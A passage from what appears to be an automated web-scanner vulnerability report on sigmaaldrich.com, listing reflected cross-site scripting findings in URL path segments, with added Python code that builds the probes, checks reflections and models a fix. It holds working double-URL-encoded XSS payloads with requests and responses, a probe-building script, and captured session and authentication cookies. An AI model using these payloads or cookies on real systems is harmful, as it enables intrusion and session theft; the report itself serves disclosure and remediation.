Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/materials-scienceb2dab";alert(1)//30fc2d7ef7a/material-science-products","E404") ;
   </script>
...[SNIP]...

1.136. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12122%2522%253balert%25281%2529%252f%252f6a61c00c995 was submitted in the REST URL parameter 5. This input was echoed as 12122";alert(1)//6a61c00c995 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products12122%2522%253balert%25281%2529%252f%252f6a61c00c995 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products12122";alert(1)//6a61c00c995","E404") ;
   </script>
...[SNIP]...

1.137. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb37%2522%253balert%25281%2529%252f%252fa7dba31e652 was submitted in the REST URL parameter 1. This input was echoed as feb37";alert(1)//a7dba31e652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
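How the request lines in these findings are formed, and how to re-check a response once a fix is deployed, as an added Python example (not Burp Suite's detection code and not the site's). The probe-building and classification functions are written here for illustration; the sample response bodies are constructed, with the vulnerable one taken from the script block shown in this finding and the "neutralised" one being what the same response is assumed to look like once the second URL-decode is removed:

```python
# Added example (not Burp Suite's or Sigma-Aldrich's code): builds the
# double-encoded probe for the Nth path segment the way the report's
# "REST URL parameter N" requests are formed, and classifies how a response
# reflects it so that a fix can be re-tested. Sample bodies are constructed.
import re

BREAKOUT = '";alert(1)//'   # the breakout sequence used by every finding in this report
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def url_encode_all(s: str) -> str:
    """Percent-encode everything except unreserved characters, using lowercase
    hex as in the report's request lines ("%2522", "%253b", ...)."""
    return "".join(c if c.isalnum() or c in "-._~" else "%%%02x" % ord(c) for c in s)


def build_probe_path(path: str, param_index: int, prefix: str, suffix: str) -> str:
    """Append prefix + double-encoded breakout + suffix to the param_index-th
    (1-based) path segment, i.e. "REST URL parameter N"."""
    segments = path.split("/")            # segments[0] is "" for the leading slash
    if not 1 <= param_index < len(segments):
        raise ValueError("no such REST URL parameter: %d" % param_index)
    segments[param_index] += prefix + url_encode_all(url_encode_all(BREAKOUT)) + suffix
    return "/".join(segments)


def classify_reflection(body: str, prefix: str, suffix: str) -> str:
    """'breakout'      : prefix";alert(1)//suffix appears verbatim inside a <script>
       'neutralised'   : prefix is inside a <script> but the quote did not survive intact
       'outside_script': prefix reflected only outside script blocks
       'absent'        : prefix not reflected at all
    Only this exact probe is checked; another context may still be injectable."""
    verdict = "outside_script" if prefix in body else "absent"
    for block in SCRIPT_RE.findall(body):
        idx = block.find(prefix)
        if idx < 0:
            continue
        if block[idx + len(prefix):].startswith(BREAKOUT + suffix):
            return "breakout"
        verdict = "neutralised"
    return verdict


# Constructed from the script block in the response to finding 1.137
VULNERABLE_BODY = (
    '<html><script language="JavaScript1.1">\n'
    '       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentfeb37'
    '";alert(1)//a7dba31e652/sigma-aldrich/areas-of-interest/programs","E404") ;\n'
    '   </script></html>'
)
# Constructed: the same response if the application's second URL-decode is removed
NEUTRALISED_BODY = VULNERABLE_BODY.replace('feb37";alert(1)//', "feb37%22%3balert%281%29%2f%2f")
# Constructed: marker reflected in page text only, not in a script
TEXT_ONLY_BODY = '<html><title>feb37";alert(1)//a7dba31e652</title></html>'

if __name__ == "__main__":
    print(build_probe_path("/content/sigma-aldrich/areas-of-interest/programs", 1, "feb37", "a7dba31e652"))
    for name, body in [("vulnerable", VULNERABLE_BODY), ("neutralised", NEUTRALISED_BODY), ("text only", TEXT_ONLY_BODY)]:
        print(name, "->", classify_reflection(body, "feb37", "a7dba31e652"))
```

The path built for parameter 1 of /content/sigma-aldrich/areas-of-interest/programs with the prefix feb37 and suffix a7dba31e652 is exactly the request line of this finding; parameters 2 and 4 reproduce the request lines of findings 1.138 and 1.140. The regex script-block extraction is deliberately crude and should not be relied on for responses whose scripts themselves contain the string "</script>".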

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; it is this second decode that turns the %22 the filter let through back into a quotation mark after validation has run. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should escape the value for the JavaScript string context on output (quotation marks, backslashes and forward slashes, so that a reflected </script> cannot close the block) rather than rely on a character blacklist.
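A model of the decode-then-interpolate path the remediation text describes, beside a hardened version of it, as an added Python example (not the site's code). The function names, the character blacklist and the assumption that the filter inspects the once-decoded value are made up for illustration; the payload and the rendered cmCreateErrorTag line are taken from this finding:

```python
# Added example (not Sigma-Aldrich's or Burp Suite's code): reproduces the
# double-decode reflection from the report and shows the hardened rendering.
# SITE, BLOCKED, the function names and the filter behaviour are assumptions.
from urllib.parse import unquote
import json
from typing import Optional

SITE = "http://www.sigmaaldrich.com:4402"   # origin echoed in the report's script block
BLOCKED = '<>"\''                           # hypothetical blacklist enforced by the app


def passes_blacklist(value: str) -> bool:
    """True when none of the blacklisted characters appear literally."""
    return not any(ch in value for ch in BLOCKED)


def render_error_tag_vulnerable(request_path: str) -> Optional[str]:
    """Reproduces the finding: validate after one decode, decode again, then
    interpolate into a double-quoted JS string. Returns None when the
    blacklist rejects the input."""
    once = unquote(request_path)          # web server's decode: %2522 -> %22
    if not passes_blacklist(once):        # filter sees %22, not a quotation mark
        return None
    twice = unquote(once)                 # application's second decode: %22 -> "
    return 'cmCreateErrorTag("Error 404 | ' + SITE + twice + '","E404") ;'


def js_string_literal(value: str) -> str:
    """Encode value as a JS string literal for an inline <script>. json.dumps
    escapes the quotation mark, backslash and control characters (including
    U+2028/U+2029); the forward slash is escaped too so that a reflected
    </script> cannot terminate the script element."""
    return json.dumps(value).replace("/", "\\/")


def render_error_tag_fixed(request_path: str) -> str:
    """Hardened path: no second decode, and output encoding for the JS string
    context instead of a blacklist."""
    once = unquote(request_path)
    return "cmCreateErrorTag(" + js_string_literal("Error 404 | " + SITE + once) + ',"E404") ;'


if __name__ == "__main__":
    probe = "/contentfeb37%2522%253balert%25281%2529%252f%252fa7dba31e652/sigma-aldrich/areas-of-interest/programs"
    print(render_error_tag_vulnerable(probe))   # breaks out of the string, as in the report
    print(render_error_tag_fixed(probe))        # %22 stays %22, slashes are escaped
    print(render_error_tag_fixed("/contentfeb37%22%3balert%281%29%2f%2fa7dba31e652/x"))  # quote arrives as \"
```

With the double-encoded probe the vulnerable function returns the exact script line shown in the response above, while the single-encoded form is stopped by the blacklist, which is why the scanner had to double-encode. The fixed function produces a harmless literal for both forms because the control is the output encoding, not the filter.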

Request

GET /contentfeb37%2522%253balert%25281%2529%252f%252fa7dba31e652/sigma-aldrich/areas-of-interest/programs HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:46 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentfeb37";alert(1)//a7dba31e652/sigma-aldrich/areas-of-interest/programs","E404") ;
   </script>
...[SNIP]...

1.138. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3650%2522%253balert%25281%2529%252f%252f8eecd9f8cc was submitted in the REST URL parameter 2. This input was echoed as e3650";alert(1)//8eecd9f8cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; it is this second decode that turns the %22 the filter let through back into a quotation mark after validation has run. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should escape the value for the JavaScript string context on output (quotation marks, backslashes and forward slashes, so that a reflected </script> cannot close the block) rather than rely on a character blacklist.

Request

GET /content/sigma-aldriche3650%2522%253balert%25281%2529%252f%252f8eecd9f8cc/areas-of-interest/programs HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:47 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldriche3650";alert(1)//8eecd9f8cc/areas-of-interest/programs","E404") ;
   </script>
...[SNIP]...

1.139. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea8c%2522%253balert%25281%2529%252f%252feba22e09a28 was submitted in the REST URL parameter 3. This input was echoed as bea8c";alert(1)//eba22e09a28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode; it is this second decode that turns the %22 the filter let through back into a quotation mark after validation has run. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should escape the value for the JavaScript string context on output (quotation marks, backslashes and forward slashes, so that a reflected </script> cannot close the block) rather than rely on a character blacklist.

Request

GET /content/sigma-aldrich/areas-of-interestbea8c%2522%253balert%25281%2529%252f%252feba22e09a28/programs HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
